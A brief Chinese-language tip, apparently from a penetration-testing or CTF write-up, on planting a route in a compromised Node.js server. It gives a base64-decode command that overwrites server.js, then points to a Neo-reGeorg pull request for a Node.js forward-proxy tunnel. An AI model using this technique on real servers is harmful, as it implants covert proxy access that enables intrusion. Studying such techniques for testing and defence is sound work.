Tips:这里讲发包的坑点,我们是可以通过写入一个bash脚本,可以删除,写入路由,重启服务,但是在写入路由时候,一定要使用一下base64格式,echo “base64内容” | base64 -d > server.js
延伸:当然我们这里https://github.com/L-codes/Neo-reGeorg/pull/66,添加该路由后就能直接使用NodeJS版本正向代理~